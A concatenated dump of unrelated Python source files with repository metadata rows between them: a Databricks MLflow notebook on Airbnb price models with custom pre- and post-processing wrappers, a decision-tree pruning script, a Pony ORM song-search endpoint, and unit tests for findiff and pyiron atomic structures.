# MAGIC %run "../Includes/Classroom-Setup"
# COMMAND ----------
# MAGIC %md
# MAGIC ## Import Data and Train Random Forest
# COMMAND ----------
# MAGIC %md
# MAGIC Import the Airbnb DataFrame.
# COMMAND ----------
import pandas as pd
from sklearn.model_selection import train_test_split
# Load the cleaned Airbnb listings; 'price' is the regression target.
# train_test_split uses its default split ratio with a fixed seed.
df = pd.read_csv("/dbfs/mnt/training/airbnb/sf-listings/airbnb-cleaned-mlflow.csv")
X_train, X_test, y_train, y_test = train_test_split(df.drop(["price"], axis=1), df[["price"]].values.ravel(), random_state=42)
# COMMAND ----------
# MAGIC %md
# MAGIC Train a random forest model.
# COMMAND ----------
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score
# Baseline: a random forest on the raw features; the held-out MSE is the
# yardstick the pre-processing below tries to improve on.
rf = RandomForestRegressor(n_estimators=100, max_depth=25)
rf.fit(X_train, y_train)
rf_mse = mean_squared_error(y_test, rf.predict(X_test))
rf_mse
# COMMAND ----------
# MAGIC %md
# MAGIC ## Pre-processing Our Data
# MAGIC
# MAGIC We would like to add some pre-processing steps to our data before training a RF model in order to decrease the MSE and improve our model's performance.
# MAGIC
# MAGIC Take a look at the first 10 rows of our data.
# COMMAND ----------
# Peek at the first 10 listings to motivate the pre-processing choices below.
df.iloc[:10]
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC Notice that all the values in the `latitude` and `longitude` columns are very similar (up to tenth place) since all the Airbnb listings are in San Francisco. The Airbnb pricing probably will not vary too much between longitude and latitude differences of 0.0001 so we can facilitate the splitting factors of our tree by rounding the `latitude` and `longitude` values to the nearest hundredth instead of worrying about all 6 digits after the decimal point. We will create these values in new columns called `trunc_lat` and `trunc_long` and drop the original `latitude` and `longitude` columns.
# MAGIC
# MAGIC Additionally, notice that the 'review_scores_accuracy',
# MAGIC 'review_scores_cleanliness', 'review_scores_checkin',
# MAGIC 'review_scores_communication', 'review_scores_location', and
# MAGIC 'review_scores_value'
# MAGIC encode pretty similar information so we will go ahead and summarize them into single column called `summed_review_scores` which contains the summation of the above 6 columns. Hopefully the tree will be able to make a more informed split given this additional information.
# MAGIC
# MAGIC
# MAGIC Fill in the pre-processing lines to create the `X_test_processed` and `X_train_processed` DataFrames. Then we will train a new random forest model off this pre-processed data.
# MAGIC
# MAGIC <img alt="Hint" title="Hint" style="vertical-align: text-bottom; position: relative; height:1.75em; top:0.3em" src="https://files.training.databricks.com/static/images/icon-light-bulb.svg"/> **Hint:** Take a look at python's built in `round` function.
# COMMAND ----------
# Shared pre-processing: all listings are in San Francisco, so rounding
# latitude/longitude to two decimals removes noise from tree splits, and
# the six highly correlated review-score columns are collapsed into one
# summed feature. The same transformation must be applied to train and
# test data, so it lives in a single helper instead of being duplicated.
REVIEW_COLS = [
    'review_scores_accuracy', 'review_scores_cleanliness',
    'review_scores_checkin', 'review_scores_communication',
    'review_scores_location', 'review_scores_value',
]

def _preprocess(features):
    """Return a copy of *features* with truncated coordinates and a summed review score."""
    out = features.copy()
    out["trunc_lat"] = out["latitude"].apply(lambda x: round(x, 2))
    out["trunc_long"] = out["longitude"].apply(lambda x: round(x, 2))
    out["review_scores_sum"] = out[REVIEW_COLS].sum(axis=1)
    return out.drop(columns=REVIEW_COLS + ["latitude", "longitude"])

# new random forest model
rf2 = RandomForestRegressor(n_estimators=100, max_depth=25)

# pre-process train and test data with the identical transformation
X_train_processed = _preprocess(X_train)
X_test_processed = _preprocess(X_test)

# fit and evaluate new rf model
rf2.fit(X_train_processed, y_train)
rf2_mse = mean_squared_error(y_test, rf2.predict(X_test_processed))
rf2_mse
# COMMAND ----------
# MAGIC %md
# MAGIC After training our new `rf2` model, let us log this run in MLflow so we can use this trained model in the future by loading it.
# COMMAND ----------
import mlflow.sklearn
import mlflow

# Log the pre-processed random forest (model artifact + its test MSE) as a
# new MLflow run so it can be reloaded later.
with mlflow.start_run(run_name="RF Model Pre-process") as run:
    mlflow.sklearn.log_model(rf2, "random-forest-model-preprocess")
    mlflow.log_metric("mse", rf2_mse)
    # keep the experiment id / artifact location around for later look-ups
    experimentID = run.info.experiment_id
    artifactURI = mlflow.get_artifact_uri()
    print(artifactURI)
# COMMAND ----------
# MAGIC %md
# MAGIC Now let's load the `python_function` flavor of the model so we can apply it to a test set.
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ### The code below has issues beyond the scope of this class. The mlflow instance called persists to say that the version is oudated when it cannot possibly be.
# MAGIC #### all the artifacts are logged, but mlflow refuses to access it.
# MAGIC #### I updated mlflow in pip and the problem persists
# MAGIC
# MAGIC ##
# MAGIC
# MAGIC ### I filled all codes as required regardless and they should run as expected.
# COMMAND ----------
# MAGIC %sh
# MAGIC pip install --upgrade mlflow
# COMMAND ----------
# MAGIC %sh
# MAGIC ls 'dbfs:/databricks/mlflow-tracking/4409869614219127/336aa53e82c844e3a1a3551aca606f05/artifacts'
# COMMAND ----------
import mlflow.pyfunc
from mlflow.tracking import MlflowClient

# Locate the artifact URI of the most recent run in this experiment and load
# its python_function flavor.  The previous version computed rf2_path and then
# ignored it, loading a hard-coded artifact path of one specific run id, which
# breaks as soon as a new run is logged.
client = MlflowClient()
rf2_run = sorted(client.list_run_infos(experimentID), key=lambda r: r.start_time, reverse=True)[0]
rf2_path = rf2_run.artifact_uri + "/random-forest-model-preprocess/"
# On Databricks, MLflow needs a local filesystem path, hence dbfs: -> /dbfs.
rf2_pyfunc_model = mlflow.pyfunc.load_model(rf2_path.replace("dbfs:", "/dbfs"))
# COMMAND ----------
# MAGIC %md
# MAGIC Let's try giving our new `rf2_pyfunc_model` the `X_test` DataFrame to generate predictions off of.
# COMMAND ----------
# Predicting on the raw test frame is expected to fail: rf2 was trained on the
# pre-processed feature set (trunc_lat / trunc_long / review_scores_sum), whose
# columns do not match X_test.
try:
    rf2_pyfunc_model.predict(X_test)
except ValueError as e:
    print("ERROR: " + str(e))
# COMMAND ----------
# MAGIC %md
# MAGIC Why did this fail?
# COMMAND ----------
# MAGIC %md
# MAGIC ## Adding Pre-Processing Steps
# MAGIC
# MAGIC We trained our `rf2` model using a pre-processed training set that has one extra column (`review_scores_sum`) than the unprocessed `X_train` and `X_test` DataFrames. The `rf2` model is expecting to have `review_scores_sum` as an input column as well. Even if `X_test` had the same number of columns as the processed data we trained on, the line above will still error since it does not have our custom truncated `trunc_lat` and `trunc_long` columns.
# MAGIC
# MAGIC To fix this, we could manually re-apply the same pre-processing logic to the `X_test` set each time we wish to use our model.
# MAGIC
# MAGIC However, there is a cleaner and more streamlined way to account for our pre-processing steps. We can define a custom model class that automatically pre-processes the raw input it receives before passing that input into the trained model's `.predict()` function. This way, in future applications of our model, we will no longer have to worry about remembering to pre-process every batch of data beforehand.
# MAGIC
# MAGIC Complete the `preprocess_input(self, model_input)` helper function of the custom `RF_with_preprocess` class so that the random forest model is always predicting off of a DataFrame with the correct column names and the appropriate number of columns.
# COMMAND ----------
# TODO
# Define the model class
class RF_with_preprocess(mlflow.pyfunc.PythonModel):
    """Pyfunc wrapper that pre-processes raw input before calling the trained RF."""

    def __init__(self, trained_rf):
        self.rf = trained_rf

    def preprocess_input(self, model_input):
        """Return a pre-processed copy of ``model_input``.

        Adds truncated latitude/longitude columns and the summed review score,
        then drops the raw review-score, latitude and longitude columns so the
        frame matches the features the model was trained on.
        """
        frame = model_input.copy()
        frame["trunc_lat"] = frame["latitude"].apply(lambda v: round(v, 2))
        frame["trunc_long"] = frame["longitude"].apply(lambda v: round(v, 2))
        score_cols = [
            'review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin',
            'review_scores_communication', 'review_scores_location', 'review_scores_value',
        ]
        frame["review_scores_sum"] = frame[score_cols].sum(axis=1)
        return frame.drop(columns=score_cols + ['latitude', 'longitude'])

    def predict(self, context, model_input):
        """Pre-process the raw input, then delegate to the wrapped RF model."""
        return self.rf.predict(self.preprocess_input(model_input.copy()))
# COMMAND ----------
# MAGIC %md
# MAGIC Let's save, then load this custom model's `python_function`.
# COMMAND ----------
# Construct and save the model
model_path = f"{workingDir}/RF_with_preprocess/"
dbutils.fs.rm(model_path, True) # remove folder if already exists

rf_preprocess_model = RF_with_preprocess(trained_rf = rf2)
mlflow.pyfunc.save_model(path=model_path.replace("dbfs:", "/dbfs"), python_model=rf_preprocess_model)

# Load the model in `python_function` format
# NOTE(review): mlflow.pyfunc.load_pyfunc is deprecated in newer MLflow in
# favor of mlflow.pyfunc.load_model — confirm the installed version supports it.
loaded_preprocess_model = mlflow.pyfunc.load_pyfunc(model_path.replace("dbfs:", "/dbfs"))
# COMMAND ----------
# MAGIC %md
# MAGIC Now we can directly give our loaded model the unmodified `X_test` and have it generate predictions without errors!
# COMMAND ----------
# Apply the model
loaded_preprocess_model.predict(X_test)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Adding Post-Processing Steps
# MAGIC
# MAGIC Now suppose we are not as interested in a numerical prediction as we are in a categorical label of `Expensive` and `Not Expensive` where the cut-off is above a price of $100. Instead of retraining an entirely new classification model, we can simply add on a post-processing step to our custom model so it returns the predicted label instead of numerical price.
# MAGIC
# MAGIC Complete the following model class with **both the previous preprocess steps and the new `postprocess_result(self, result)`** function such that passing in `X_test` into our model will return an `Expensive` or `Not Expensive` label for each row.
# COMMAND ----------
# TODO
# Define the model class
class RF_with_postprocess(mlflow.pyfunc.PythonModel):
    """Pyfunc wrapper adding both pre- and post-processing around the trained RF.

    Raw input is transformed to the trained feature set, and numeric price
    predictions are mapped to 'Expensive' / 'Not Expensive' labels.
    """

    def __init__(self, trained_rf):
        self.rf = trained_rf

    def preprocess_input(self, model_input):
        """Return pre-processed model_input (same steps as RF_with_preprocess)."""
        processed = model_input.copy()
        processed["trunc_lat"] = processed["latitude"].apply(lambda x: round(x, 2))
        processed["trunc_long"] = processed["longitude"].apply(lambda x: round(x, 2))
        col_names = ['review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin',
                     'review_scores_communication', 'review_scores_location', 'review_scores_value']
        processed["review_scores_sum"] = processed[col_names].sum(axis=1)
        return processed.drop(columns=col_names + ['latitude', 'longitude'])

    def postprocess_result(self, results):
        """Map each predicted price to a label.

        Expensive: predicted price > 100
        Not Expensive: predicted price <= 100
        """
        return ['Expensive' if y > 100 else 'Not Expensive' for y in results]

    def predict(self, context, model_input):
        """Pre-process the raw input, predict, and post-process to labels."""
        processed_model_input = self.preprocess_input(model_input.copy())
        results = self.rf.predict(processed_model_input)
        return self.postprocess_result(results)
# COMMAND ----------
# MAGIC %md
# MAGIC Create, save, and apply the model to `X_test`.
# COMMAND ----------
# Construct and save the model
model_path = f"{workingDir}/RF_with_postprocess/"
dbutils.fs.rm(model_path, True) # remove folder if already exists

rf_postprocess_model = RF_with_postprocess(trained_rf = rf2)
mlflow.pyfunc.save_model(path=model_path.replace("dbfs:", "/dbfs"), python_model=rf_postprocess_model)

# Load the model in `python_function` format
# NOTE(review): mlflow.pyfunc.load_pyfunc is deprecated in newer MLflow in
# favor of mlflow.pyfunc.load_model — confirm the installed version supports it.
loaded_postprocess_model = mlflow.pyfunc.load_pyfunc(model_path.replace("dbfs:", "/dbfs"))

# Apply the model: the unmodified X_test is pre-processed internally and the
# output is a list of 'Expensive' / 'Not Expensive' labels.
loaded_postprocess_model.predict(X_test)
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC Given any unmodified raw data, our model can perform the pre-processing steps, apply the trained model, and follow the post-processing step all in one `.predict` function call!
# COMMAND ----------
# MAGIC %md
# MAGIC ##  Classroom-Cleanup<br>
# MAGIC
# MAGIC Run the **`Classroom-Cleanup`** cell below to remove any artifacts created by this lesson.
# COMMAND ----------
# MAGIC %run "../Includes/Classroom-Cleanup"
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC <h2><img src="https://files.training.databricks.com/images/105/logo_spark_tiny.png"> All done!</h2>
# COMMAND ----------
# MAGIC %md-sandbox
# MAGIC © 2020 Databricks, Inc. All rights reserved.<br/>
# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the <a href="http://www.apache.org/">Apache Software Foundation</a>.<br/>
# MAGIC <br/>
# MAGIC <a href="https://databricks.com/privacy-policy">Privacy Policy</a> | <a href="https://databricks.com/terms-of-use">Terms of Use</a> | <a href="http://help.databricks.com/">Support</a>
| 41.706371 | 600 | 0.733794 |
c926a35a08af267609a89ca5ca52f05d5085239e | 4,878 | py | Python | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | Assignments/HW2-PruningProblems-Yan Gu/PruningProblems/question3b.py | billgoo/Rutgers-CS536-Machine-Learning | 944efbc6ee5ccd2d226e420ed61528767023aab7 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import math
import csv
import random
import matplotlib.pyplot as plt
from pprint import pprint
from decision_tree_classifier import DecisionTreeClassifier
from decision_tree_plotter import plotter
from collections import Counter
def show_Picture(x_data, y_data_1, y_data_2, y_data_name1, y_data_name2, x_label, y_label, title):
    """Plot two error curves over x_data, annotate every point, save and show.

    The output file name is derived from the figure tag embedded in *title*
    (characters 4-5, e.g. "Fig 3b..." -> "3b") under images/question3/.
    """
    plt.figure(figsize=(16, 8))
    plt.xlabel(x_label)
    plt.ylabel(y_label)
    plt.title(title)
    plt.plot(x_data, y_data_1, marker='.', c='red', lw=0.5, label=y_data_name1)
    plt.plot(x_data, y_data_2, marker='x', c='blue', lw=0.5, label=y_data_name2)
    for x, y1, y2 in zip(x_data, y_data_1, y_data_2):
        plt.annotate("(%s, %.4f)" % (x, y1),
                     xy=(x, y1), xytext=(-20, -20), textcoords='offset points', color='red')
        # Bug fix: the second annotation previously printed the value of the
        # *first* curve (y_data_1[i]) while pointing at the y_data_2 point.
        plt.annotate("(%s, %.4f)" % (x, y2),
                     xy=(x, y2), xytext=(-20, 13), textcoords='offset points', color='blue')
    plt.legend(loc='upper right')
    filename = 'images/question3/Figure.' + title[4:6] + '.png'
    # save the picture, filename is derived from the title
    plt.savefig(filename, bbox_inches='tight')
    plt.show()
if __name__ == "__main__":
    # Sweep the minimum-sample-size pruning parameter of an ID3 decision tree
    # and record train/test error for each setting.
    estimation = []
    m = 10000
    fname = 'data/question3/data_m_' + str(m) + '.csv'
    dataset = pd.read_csv(fname, names=['X0','X1','X2','X3','X4','X5',
                                        'X6','X7','X8','X9','X10',
                                        'X11','X12','X13','X14','X15',
                                        'X16','X17','X18','X19','X20','Y'])
    train_data = dataset[0:8000] # 0-7999, totally 8000 data
    test_data = dataset[8000:].reset_index(drop=True) # 8000-9999, totally 2000 data
    # Candidate sizes: 1 plus the sequence 10000, 5000, 2500, ... (halving).
    x_points = [1]
    i = 10000
    while i:
        x_points.append(i)
        i = i // 2
    # we have already know 2^13 < 10000 < 2^14
    # so len(S) = 13
    # to increase the sample size in S, we choose every size to be the average of
    # each two numbers in the S
    for j in range(1, 13):
        x_points.append((x_points[j-1] + x_points[j]) // 2)
    S = list(set(x_points))
    S.sort()
    for s in S:
        # Fit one tree per minimum sample size s, pruning by that size.
        classifier = DecisionTreeClassifier(m, train_data)
        tree = classifier.fit_ID3_Pruning_Size(s, classifier.tree_with_data, train_data,
                                               train_data, train_data.columns[:-1])
        # error for train and test data
        err_train = classifier.score_Pruning(train_data, tree)
        err_test = classifier.score_Pruning(test_data, tree)
        estimation.append([s, err_train, err_test])
        print(s, err_train, err_test)
        print("Tree with sample size = " + str(s) + " is :")
        pprint(tree)
    # output the data to be re-format
    with open('data/question3/3b.csv', 'w', newline='') as csvfile:
        spamwriter = csv.writer(csvfile, delimiter=',',
                                quotechar='|', quoting=csv.QUOTE_MINIMAL)
        for row in estimation:
            spamwriter.writerow(row)
    # re-format and draw the xy-coordinate figure
    datamap = pd.read_csv('data/question3/3b.csv', names=['minmum sample size','err_train','err_test'])
    col_d = datamap['minmum sample size']
    col_train = datamap['err_train']
    col_test = datamap['err_test']
    # Full range plus zoomed-in windows over overlapping slices of S.
    show_Picture(col_d, col_train, col_test, "err_train", "err_test",
                 "Minmum sample size", "Error of the tree", "Fig 3b: Error of decision tree for different minmum sample size.")
    show_Picture(col_d[0:9].reset_index(drop=True), col_train[0:9].reset_index(drop=True),
                 col_test[0:9].reset_index(drop=True),
                 "err_train", "err_test", "Minmum sample size", "Error of the tree",
                 "Fig 3b(1): Error of decision tree for different minmum sample size.")
    show_Picture(col_d[6:14].reset_index(drop=True), col_train[6:14].reset_index(drop=True),
                 col_test[6:14].reset_index(drop=True),
                 "err_train", "err_test", "Minmum sample size", "Error of the tree",
                 "Fig 3b(2): Error of decision tree for different minmum sample size.")
    show_Picture(col_d[11:19].reset_index(drop=True), col_train[11:19].reset_index(drop=True),
                 col_test[11:19].reset_index(drop=True),
                 "err_train", "err_test", "Minmum sample size",
                 "Error of the tree", "Fig 3b(3): Error of decision tree for different minmum sample size.")
    show_Picture(col_d[16:22].reset_index(drop=True), col_train[16:22].reset_index(drop=True),
                 col_test[16:22].reset_index(drop=True),
                 "err_train", "err_test", "Minmum sample size", "Error of the tree",
                 "Fig 3b(4): Error of decision tree for different minmum sample size.")
| 45.166667 | 126 | 0.602091 |
63a8171fabe11b379423fe8d8b76f169912f6797 | 3,156 | py | Python | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | endpoints/search/endpoint.py | Ragnar-Oock/setlist_v2_connexion | 760c7bfca83467f118778ad7bd3dd9cc78cf5007 | [
"MIT"
] | null | null | null | from pony import orm
from models import Song
from utils.db import format_order_by
from datetime import timedelta, datetime
from decimal import Decimal
def get(limit, padding, orderby: list, search=None, lastInterpretation=None,
        interpretationNumber=None, score=None, showlights=None, vocals=None, odlc=None, arrangements=None):
    """Search songs with optional fuzzy-text, feature and interpretation filters.

    Args:
        limit / padding: page size and offset of the result window.
        orderby: list of sort keys for format_order_by; a '-similarity' key is
            prepended when a fuzzy search term is given.  The caller's list is
            no longer mutated (the original implementation inserted into it).
        search: fuzzy full-text term (pg_trgm similarity > .1).
        lastInterpretation / interpretationNumber / score: [low, high] ranges;
            [0, 100] means "no filter", and a high bound >= 100 means unbounded.
        showlights / vocals / odlc: boolean song-feature filters.
        arrangements: list of arrangement type names the song must contain.

    Returns:
        ({'data': [serialized songs]}, 200)
    """
    search_results = orm.select(s for s in Song)

    # fuzzy search
    if search:
        search_results = search_results.where(orm.raw_sql('similarity("s"."fts_col", $search) > .1'))
        # prepend similarity to the order-by keys without mutating the caller's list
        orderby = ['-similarity'] + orderby

    # does the song has showlights
    if showlights:
        search_results = search_results.where(lambda s: s.showlights == showlights)

    # does the song display lyrics
    if vocals:
        search_results = search_results.where(lambda s: s.vocals == vocals)

    # is the song a odlc or a cdlc
    if odlc is not None:
        search_results = search_results.where(lambda s: s.official == odlc)

    # --- arrangement specific fields ---
    # does the song have certain arrangements
    if arrangements:
        # Build the Pony filter string "arrangements[0] in s.arrangements.type
        # or arrangements[1] in ..." directly; the previous version prefixed
        # every clause with 'or ' and stripped the first one via str.split.
        filter_function = ' or '.join(
            'arrangements[{}] in s.arrangements.type'.format(i) for i in range(len(arrangements))
        )
        search_results = search_results.where(filter_function)

    # --- interpretation specific fields ---
    # how many times does the song was played
    if interpretationNumber != [0, 100]:
        lower_bound = min(interpretationNumber[0], interpretationNumber[1])
        upper_bound = max(interpretationNumber[0], interpretationNumber[1])
        search_results = search_results.where(
            lambda s:
            lower_bound <= orm.count(s.interpretations)
            and (orm.count(s.interpretations) <= upper_bound or upper_bound >= 100)
        )

    if lastInterpretation != [0, 100]:
        # higher bound in days to allow no-maximum calculation when >= 100
        upper_bound = max(lastInterpretation[0], lastInterpretation[1])
        # datetime bounds to be used in where clause
        older_bound = datetime.now() - timedelta(days=max(lastInterpretation[0], lastInterpretation[1]))
        youger_bound = datetime.now() - timedelta(days=min(lastInterpretation[0], lastInterpretation[1]))
        search_results = search_results.where(
            lambda s:
            youger_bound > orm.max(s.interpretations.date)
            and (orm.max(s.interpretations.date) <= older_bound or upper_bound >= 100)
        )

    if score != [0, 100]:
        lower_bound = Decimal(min(score[0], score[1]))
        upper_bound = Decimal(max(score[0], score[1]))
        search_results = search_results.where(
            lambda s:
            lower_bound <= orm.max(s.interpretations.score) and orm.max(s.interpretations.score) <= upper_bound
        )

    # apply order by, limit and padding
    search_results = search_results \
        .order_by(format_order_by(orderby)) \
        .limit(limit=limit, offset=padding)

    return {'data': [s.serialize() for s in search_results]}, 200
| 40.461538 | 111 | 0.665716 |
a7d53e8f0bd268a58c444424cf754b055db7ea6e | 1,171 | py | Python | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | test/test_utils.py | diehlpk/findiff | 7ec4cd83a461b30a6fca87494c135977cf54b1d3 | [
"MIT"
] | null | null | null | import sys
sys.path.insert(1, '..')
import unittest
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from findiff.utils import *
class TestUtils(unittest.TestCase):
def test_all_index_tuples_for_shape(self):
shape = 2, 3
expected = []
for ix in range(shape[0]):
for iy in range(shape[1]):
expected.append((ix, iy))
actual = all_index_tuples_as_list(shape)
for a, e in zip(actual, expected):
self.assertEqual(e, a)
def test_to_long_index(self):
shape = 3, 4, 5
all_tuples = all_index_tuples_as_list(shape)
expected = list(range(np.prod(shape)))
for i, idx in enumerate(all_tuples):
actual = to_long_index(idx, shape)
self.assertEqual(expected[i], actual)
def test_to_index_tuple(self):
shape = 3, 4, 5
all_tuples = all_index_tuples_as_list(shape)
for long_idx in range(np.prod(shape)):
expected = all_tuples[long_idx]
actual = to_index_tuple(long_idx, shape)
np.testing.assert_array_equal(expected, actual)
| 25.456522 | 71 | 0.631085 |
d4c4befbf5ed06144dbf6b548cb9a73986587686 | 68,750 | py | Python | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | null | null | null | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | 1 | 2021-11-02T09:22:56.000Z | 2021-11-02T09:22:56.000Z | tests/atomistics/structure/test_atoms.py | ibrsam/pyiron | 14ffbc2bba6e13738e2d995cbe3f900df3946b1f | [
"BSD-3-Clause"
] | 1 | 2021-11-02T08:35:47.000Z | 2021-11-02T08:35:47.000Z | # coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import unittest
import numpy as np
import os
import warnings
from pyiron.atomistics.structure.atom import Atom
from pyiron.atomistics.structure.atoms import Atoms, CrystalStructure
from pyiron.atomistics.structure.factory import StructureFactory
from pyiron.atomistics.structure.sparse_list import SparseList
from pyiron.atomistics.structure.periodic_table import PeriodicTable, ChemicalElement
from pyiron_base import FileHDFio, ProjectHDFio, Project
from ase.cell import Cell as ASECell
from ase.atoms import Atoms as ASEAtoms
class TestAtoms(unittest.TestCase):
@classmethod
def tearDownClass(cls):
file_location = os.path.dirname(os.path.abspath(__file__))
if os.path.isfile(
os.path.join(file_location, "../../static/atomistics/test_hdf")
):
os.remove(
os.path.join(file_location, "../../static/atomistics/test_hdf")
)
if os.path.isfile(
os.path.join(file_location, "../../static/atomistics/test.h5")
):
os.remove(
os.path.join(file_location, "../../static/atomistics/test.h5")
)
@classmethod
def setUpClass(cls):
C = Atom("C").element
cls.C3 = Atoms([C, C, C], positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]])
cls.C2 = Atoms(2 * [Atom("C")])
cls.struct_factory = StructureFactory()
def setUp(self):
# These atoms are reset before every test.
self.CO2 = Atoms("CO2", positions=[[0, 0, 0], [0, 0, 1.5], [0, 1.5, 0]])
def test__init__(self):
pos, cell = generate_fcc_lattice()
pse = PeriodicTable()
el = pse.element("Al")
basis = Atoms()
ase_basis = ASEAtoms()
self.assertIsInstance(ase_basis, ASEAtoms)
self.assertIsInstance(ase_basis.info, dict)
self.assertIsInstance(ase_basis.arrays, dict)
self.assertIsInstance(ase_basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(ase_basis._cellobj, ASECell)
self.assertIsInstance(basis, Atoms)
self.assertIsInstance(basis.info, dict)
self.assertIsInstance(basis.arrays, dict)
self.assertIsInstance(basis.units, dict)
self.assertIsInstance(basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(basis.indices, np.ndarray)
self.assertEqual(len(basis.positions), 0)
self.assertIsInstance(basis.species, list)
self.assertIsInstance(basis.elements, np.ndarray)
basis = Atoms(symbols="Al", positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
self.assertEqual(basis.get_spacegroup()["Number"], 225)
basis = Atoms(elements="Al", positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
basis = Atoms(elements=["Al"], positions=pos, cell=cell)
self.assertIsInstance(basis, Atoms)
self.assertRaises(
ValueError, Atoms, symbols="Pt", elements="Al", positions=pos, cell=cell
)
basis = Atoms(numbers=[13], positions=pos, cell=cell)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
basis = Atoms(species=[el], indices=[0], positions=pos, cell=cell)
self.assertEqual(basis.get_majority_species()["symbol"], "Al")
self.assertIsInstance(basis, Atoms)
self.assertIsInstance(basis.info, dict)
self.assertIsInstance(basis.arrays, dict)
self.assertIsInstance(basis.units, dict)
self.assertIsInstance(basis.pbc, (bool, list, np.ndarray))
self.assertIsInstance(basis.indices, np.ndarray)
self.assertIsInstance(basis.species, list)
self.assertIsInstance(basis.cell, ASECell)
self.assertIsInstance(basis.positions, np.ndarray)
self.assertIsInstance(basis.get_scaled_positions(), np.ndarray)
self.assertIsInstance(basis.elements, np.ndarray)
def test_set_species(self):
    """set_species must replace the structure's chemical species in place."""
    pos, cell = generate_fcc_lattice()
    pse = PeriodicTable()
    el = pse.element("Pt")
    basis = Atoms(symbols="Al", positions=pos, cell=cell)
    self.assertEqual(basis.get_chemical_formula(), "Al")
    basis.set_species([el])
    self.assertEqual(basis.get_chemical_formula(), "Pt")
    # Bug fix: assertTrue(<generator expression>) is always truthy, so the
    # original membership assertions could never fail.  Evaluate them for real.
    abbreviations = [sp.Abbreviation for sp in basis._species_to_index_dict.keys()]
    self.assertNotIn("Al", abbreviations)
    self.assertIn("Pt", abbreviations)
def test_new_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis))
basis.new_array(name="spins", a=spins)
self.assertTrue(np.array_equal(basis.arrays["spins"], spins))
def test_set_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis), dtype=float)
basis.set_array(name="spins", a=2 * spins, dtype=int)
self.assertTrue(np.array_equal(basis.arrays["spins"], 2 * spins))
def test_get_array(self):
pos, cell = generate_fcc_lattice()
basis = Atoms(symbols="Al", positions=pos, cell=cell)
basis.set_repeat([10, 10, 10])
spins = np.ones(len(basis), dtype=float)
basis.set_array(name="spins", a=2 * spins, dtype=int)
self.assertTrue(np.array_equal(basis.arrays["spins"], 2 * spins))
self.assertTrue(np.array_equal(basis.get_array(name="spins"), 2 * spins))
def test_add_tags(self):
    # add_tag with a scalar value exposes it for every atom through a SparseList
    self.CO2.add_tag(test_tag="a")
    self.assertIsInstance(self.CO2.test_tag, SparseList)
    self.assertEqual(self.CO2.test_tag[0], "a")
    self.assertEqual(self.CO2.test_tag[0], self.CO2.test_tag[2])
    self.assertIsInstance(self.CO2.test_tag.list(), list)
    # per-atom tag entries can be overwritten individually after creation
    self.CO2.add_tag(selective_dynamics=[True, True, True])
    self.CO2.selective_dynamics[1] = [True, False, True]
    self.assertEqual(self.CO2.selective_dynamics[1], [True, False, True])
    self.assertIsInstance(self.CO2.selective_dynamics.list(), list)
def test_get_tags(self):
self.CO2.add_tag(test_tag="a")
self.assertIsInstance(self.CO2.test_tag, SparseList)
self.assertIsInstance(self.CO2.get_tags(), type(dict().keys()))
def test_get_pbc(self):
    """get_pbc mirrors the pbc attribute and carries one flag per axis."""
    pbc_flags = self.CO2.get_pbc()
    self.assertTrue(np.array_equal(self.CO2.pbc, pbc_flags))
    self.assertEqual(len(pbc_flags), 3)
def test_set_pbc(self):
    """set_pbc accepts both a per-axis sequence and a single scalar flag."""
    self.CO2.set_pbc([True, True, False])
    current = self.CO2.get_pbc()
    self.assertTrue(np.array_equal(self.CO2.pbc, current))
    self.assertTrue(np.array_equal([True, True, False], current))
    # a scalar broadcasts to all three directions
    self.CO2.set_pbc(False)
    current = self.CO2.get_pbc()
    self.assertTrue(np.array_equal([False, False, False], current))
    self.assertTrue(np.array_equal(self.CO2.pbc, current))
def test_chemical_element(self):
conv = self.CO2.convert_element("C")
self.assertIsInstance(conv, ChemicalElement)
self.assertIsInstance(self.CO2.convert_element(conv), ChemicalElement)
